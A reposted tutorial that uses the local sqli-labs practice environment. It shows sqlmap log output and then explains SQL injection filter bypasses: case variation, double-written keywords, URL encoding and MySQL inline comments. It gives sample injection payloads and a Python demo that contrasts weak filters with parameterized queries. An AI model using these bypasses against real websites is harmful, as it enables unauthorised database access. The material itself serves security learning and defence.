[20:49:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                              
[20:49:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                                                                      
[20:49:41] [WARNING] POST parameter 'uname' does not seem to be injectable                                                                                
[20:49:41] [INFO] testing if POST parameter 'passwd' is dynamic                                                                                           
[20:49:41] [WARNING] POST parameter 'passwd' does not appear to be dynamic                                                                                
[20:49:41] [WARNING] heuristic (basic) test shows that POST parameter 'passwd' might not be injectable                                                    
[20:49:41] [INFO] testing for SQL injection on POST parameter 'passwd'                                                                                    
[20:49:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                              
[20:49:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                                                                      
[20:49:41] [WARNING] POST parameter 'passwd' does not seem to be injectable                                                                               
[20:49:41] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 20:49:41 /2020-03-04/

Clearly, the current database was not detected this time; further probing is needed.

III. SQL injection bypass techniques

If the program filters on keywords, but the filtering does not analyse how a keyword is composed and only matches it as a whole, the filter can be bypassed.
For example, a filter for and that only acts when it finds the literal keyword, without further processing it, can be evaded by the techniques below.

1. Case-variation bypass

Change the case of letters inside the keyword to get past the filter.
For example:

and becomes AnD or ANd
order by becomes OrDEr bY

2. Double-write bypass

If the program replaces a keyword with the empty string whenever it appears, a plain SQL injection attack will not succeed.
Such a filter can be bypassed by writing the keyword twice (nested), because the filter performs only a single replacement, so one intact keyword remains and the injection can still be probed.
For example:

and becomes aandnd
or becomes oorr

3. Encoding bypass

A URL-encoding tool can be used to bypass the SQL injection filter.
For example:
http://127.0.0.1/sqli-labs/Less-5/?id=1' AND 3835=3835 AND 'YqTv'='YqTv --+ can be changed to http://127.0.0.1/sqli-labs/less-5/?id=1%27%20and%203835=3835%20and%20%27yqtv%27=%27yqtv%20--+
The URL encoding can be done in HackBar or at http://tool.chinaz.com/Tools/urlencode.aspx.

4. Inline-comment bypass

In MySQL, the contents of a /*! ... */ inline comment are executed as part of the SQL statement.
For example:

/*!select*/ * from users;

Output:

+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 13 | admin4   | admin4     |
| 14 | admin5   | admin5     |
+----+----------+------------+
14 rows in set (0.00 sec)     

That is, SQL wrapped in an inline comment still executes normally.
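As an added example (not code from the original post), the following Python script shows why the keyword blacklists that sections 1 to 4 defeat are the wrong defence, and what the real fix is. naive_filter is a hypothetical single-pass, case-sensitive keyword-stripping filter of the kind the post describes, run on the raw URL-encoded parameter; normalize and robust_filter are a hypothetical defence-in-depth canonicalisation that neutralises the case, double-write, URL-encoding and /*! ... */ inline-comment tricks; lookup_vulnerable and lookup_parameterized contrast string concatenation with a bound parameter. The users rows are constructed, not the sqli-labs table above, and SQLite stands in for MySQL.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample rows for this example; not the sqli-labs users table from the post.
SAMPLE_USERS = [(1, "alice", "alice-pw"), (2, "bob", "bob-pw")]

# Hypothetical blacklist used by the weak filter below.
KEYWORDS = ("and", "or", "select", "union")


def make_db():
    """In-memory SQLite database standing in for MySQL, loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def naive_filter(value):
    """The weak filter the post describes: one case-sensitive replace of each
    keyword by the empty string, run on the raw (still URL-encoded) parameter.
    Case variation and encoding pass through untouched; a double-written
    keyword loses one copy and leaves a working keyword behind."""
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    return value


def normalize(value):
    """Canonicalise the parameter before any inspection: URL-decode until the
    value stops changing (catches double encoding), lower-case it, unwrap
    MySQL /*! ... */ inline comments, and collapse whitespace."""
    prev = None
    while prev != value:
        prev = value
        value = urllib.parse.unquote(value)
    value = value.lower()
    value = re.sub(r"/\*!\d*\s*(.*?)\*/", r"\1", value, flags=re.S)
    return re.sub(r"\s+", " ", value)


def robust_filter(value):
    """Hypothetical defence-in-depth filter: normalise, then strip keywords
    repeatedly until nothing changes, so 'aandnd' cannot leave an 'and' behind.
    It still damages innocent input ('password' loses its 'or'), which is why
    a blacklist is never the real fix."""
    value = normalize(value)
    prev = None
    while prev != value:
        prev = value
        for kw in KEYWORDS:
            value = value.replace(kw, "")
    return value


def lookup_vulnerable(conn, user_id):
    """The actual bug: the parameter is pasted into the SQL text, so a value
    such as  1' or 1=1 --  changes the query's logic and returns every row."""
    sql = f"SELECT id, username FROM users WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """The fix: a bound parameter is always data, never SQL, so the same value
    simply matches no row and no keyword filter is needed at all."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    for payload in ("1' AnD 1=1", "1' aandnd 1=1", "1'%20%61nd%201=1"):
        print(repr(payload), "->", repr(naive_filter(payload)), "|", repr(robust_filter(payload)))
    print(normalize("/*!select*/ 1"))
    print(lookup_vulnerable(conn, "1' or 1=1 --"))
    print(lookup_parameterized(conn, "1' or 1=1 --"))
```

Even the normalising filter is only a detection aid: it rewrites legitimate values (a username containing "or" is mangled) and a blacklist can never enumerate every encoding. The query built with a bound parameter is unaffected by all four bypasses because the value never becomes part of the SQL text, so that is where the fix belongs, with the filter at most feeding a WAF alert.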

Reposted from blog.csdn.net/CUFEECR/article/details/104671357